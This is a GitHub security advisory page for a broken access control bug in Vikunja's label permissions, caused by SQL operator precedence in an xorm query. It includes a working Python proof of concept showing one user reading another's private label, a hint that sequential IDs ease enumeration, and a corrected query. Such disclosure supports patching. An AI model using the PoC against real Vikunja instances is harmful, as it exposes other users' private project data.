GHSA-HJ5C-MHH2-G7JQ

Vulnerability from github – Published: 2026-04-10 15:33 – Updated: 2026-04-10 15:33
VLAI?
Summary
Vikunja has Broken Access Control on Label Read via SQL Operator Precedence Bug
Details

Summary

The hasAccessToLabel function contains a SQL operator precedence bug that allows any authenticated user to read any label that has at least one task association, regardless of project access. Label titles, descriptions, colors, and creator information are exposed.

Details

The access control query at pkg/models/label_permissions.go:85-91 uses xorm's query chain in a way that produces SQL without proper grouping:

has, err = s.Table("labels").
    Select("label_tasks.*").
    Join("LEFT", "label_tasks", "label_tasks.label_id = labels.id").
    Where("label_tasks.label_id is not null OR labels.created_by_id = ?", createdByID).
    Or(cond).
    And("labels.id = ?", l.ID).
    Exist(ll)

The xorm chain .Where(A OR B).Or(C).And(D) generates SQL: WHERE A OR B OR C AND D. Because SQL AND has higher precedence than OR, this evaluates as WHERE A OR B OR (C AND D). The labels.id = ? constraint (D) only binds to the project access condition (C), while label_tasks.label_id IS NOT NULL (part of A) remains unconstrained.

Any label that has at least one task association passes the IS NOT NULL check, regardless of who is requesting it.

Proof of Concept

Tested on Vikunja v2.2.2.

import requests

TARGET = "http://localhost:3456"
API = f"{TARGET}/api/v1"

def login(u, p):
    return requests.post(f"{API}/login", json={"username": u, "password": p}).json()["token"]

def h(token):
    return {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}

a_token = login("labeler", "Labeler123!")
b_token = login("snooper", "Snooper123!")

# labeler creates private project, label, task, and assigns label
proj = requests.put(f"{API}/projects", headers=h(a_token),
                    json={"title": "Private Project"}).json()
label = requests.put(f"{API}/labels", headers=h(a_token),
                     json={"title": "CONFIDENTIAL-REVENUE", "hex_color": "ff0000"}).json()
task = requests.put(f"{API}/projects/{proj['id']}/tasks", headers=h(a_token),
                    json={"title": "Q4 revenue data"}).json()
requests.put(f"{API}/tasks/{task['id']}/labels", headers=h(a_token),
             json={"label_id": label["id"]})

# snooper reads the label from labeler's private project
r = requests.get(f"{API}/labels/{label['id']}", headers=h(b_token))
print(f"GET /labels/{label['id']}: {r.status_code}")  # 200 - should be 403
if r.status_code == 200:
    data = r.json()
    print(f"Title: {data['title']}")  # CONFIDENTIAL-REVENUE
    print(f"Creator: {data['created_by']['username']}")  # labeler

Output:

GET /labels/1: 200
Title: CONFIDENTIAL-REVENUE
Creator: labeler

Label IDs are sequential integers, making enumeration straightforward.

Impact

Any authenticated user can read label metadata (titles, descriptions, colors) and creator user information from any project in the instance, provided the labels are attached to at least one task. This constitutes cross-project information disclosure. The creator's username and display name are also exposed.

Recommended Fix

Use explicit builder.And/builder.Or grouping:

has, err = s.Table("labels").
    Select("label_tasks.*").
    Join("LEFT", "label_tasks", "label_tasks.label_id = labels.id").
    Where(builder.And(
        builder.Eq{"labels.id": l.ID},
        builder.Or(
            builder.And(builder.Expr("label_tasks.label_id is not null"), cond),
            builder.Eq{"labels.created_by_id": createdByID},
        ),
    )).
    Exist(ll)

Found and reported by aisafe.io

Severity ?
4.3 (Medium)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.2.2"
      },
      "package": {
        "ecosystem": "Go",
        "name": "code.vikunja.io/api"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-35596"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-10T15:33:59Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe `hasAccessToLabel` function contains a SQL operator precedence bug that allows any authenticated user to read any label that has at least one task association, regardless of project access. Label titles, descriptions, colors, and creator information are exposed.\n\n## Details\n\nThe access control query at `pkg/models/label_permissions.go:85-91` uses xorm\u0027s query chain in a way that produces SQL without proper grouping:\n\n```go\nhas, err = s.Table(\"labels\").\n    Select(\"label_tasks.*\").\n    Join(\"LEFT\", \"label_tasks\", \"label_tasks.label_id = labels.id\").\n    Where(\"label_tasks.label_id is not null OR labels.created_by_id = ?\", createdByID).\n    Or(cond).\n    And(\"labels.id = ?\", l.ID).\n    Exist(ll)\n```\n\nThe xorm chain `.Where(A OR B).Or(C).And(D)` generates SQL: `WHERE A OR B OR C AND D`. Because SQL AND has higher precedence than OR, this evaluates as `WHERE A OR B OR (C AND D)`. The `labels.id = ?` constraint (D) only binds to the project access condition (C), while `label_tasks.label_id IS NOT NULL` (part of A) remains unconstrained.\n\nAny label that has at least one task association passes the `IS NOT NULL` check, regardless of who is requesting it.\n\n## Proof of Concept\n\nTested on Vikunja v2.2.2.\n\n```python\nimport requests\n\nTARGET = \"http://localhost:3456\"\nAPI = f\"{TARGET}/api/v1\"\n\ndef login(u, p):\n    return requests.post(f\"{API}/login\", json={\"username\": u, \"password\": p}).json()[\"token\"]\n\ndef h(token):\n    return {\"Authorization\": f\"Bearer {token}\", \"Content-Type\": \"application/json\"}\n\na_token = login(\"labeler\", \"Labeler123!\")\nb_token = login(\"snooper\", \"Snooper123!\")\n\n# labeler creates private project, label, task, and assigns label\nproj = requests.put(f\"{API}/projects\", headers=h(a_token),\n                    json={\"title\": \"Private Project\"}).json()\nlabel = requests.put(f\"{API}/labels\", headers=h(a_token),\n                     json={\"title\": \"CONFIDENTIAL-REVENUE\", \"hex_color\": \"ff0000\"}).json()\ntask = requests.put(f\"{API}/projects/{proj[\u0027id\u0027]}/tasks\", headers=h(a_token),\n                    json={\"title\": \"Q4 revenue data\"}).json()\nrequests.put(f\"{API}/tasks/{task[\u0027id\u0027]}/labels\", headers=h(a_token),\n             json={\"label_id\": label[\"id\"]})\n\n# snooper reads the label from labeler\u0027s private project\nr = requests.get(f\"{API}/labels/{label[\u0027id\u0027]}\", headers=h(b_token))\nprint(f\"GET /labels/{label[\u0027id\u0027]}: {r.status_code}\")  # 200 - should be 403\nif r.status_code == 200:\n    data = r.json()\n    print(f\"Title: {data[\u0027title\u0027]}\")  # CONFIDENTIAL-REVENUE\n    print(f\"Creator: {data[\u0027created_by\u0027][\u0027username\u0027]}\")  # labeler\n```\n\nOutput:\n```\nGET /labels/1: 200\nTitle: CONFIDENTIAL-REVENUE\nCreator: labeler\n```\n\nLabel IDs are sequential integers, making enumeration straightforward.\n\n## Impact\n\nAny authenticated user can read label metadata (titles, descriptions, colors) and creator user information from any project in the instance, provided the labels are attached to at least one task. This constitutes cross-project information disclosure. The creator\u0027s username and display name are also exposed.\n\n## Recommended Fix\n\nUse explicit `builder.And`/`builder.Or` grouping:\n\n```go\nhas, err = s.Table(\"labels\").\n    Select(\"label_tasks.*\").\n    Join(\"LEFT\", \"label_tasks\", \"label_tasks.label_id = labels.id\").\n    Where(builder.And(\n        builder.Eq{\"labels.id\": l.ID},\n        builder.Or(\n            builder.And(builder.Expr(\"label_tasks.label_id is not null\"), cond),\n            builder.Eq{\"labels.created_by_id\": createdByID},\n        ),\n    )).\n    Exist(ll)\n```\n\n---\n*Found and reported by [aisafe.io](https://aisafe.io)*",
  "id": "GHSA-hj5c-mhh2-g7jq",
  "modified": "2026-04-10T15:33:59Z",
  "published": "2026-04-10T15:33:59Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-hj5c-mhh2-g7jq"
    },
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/pull/2578"
    },
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/commit/fc216c38afaa51dd56dde7a97343d2148ecf24c1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/go-vikunja/vikunja"
    },
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Vikunja has Broken Access Control on Label Read via SQL Operator Precedence Bug"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.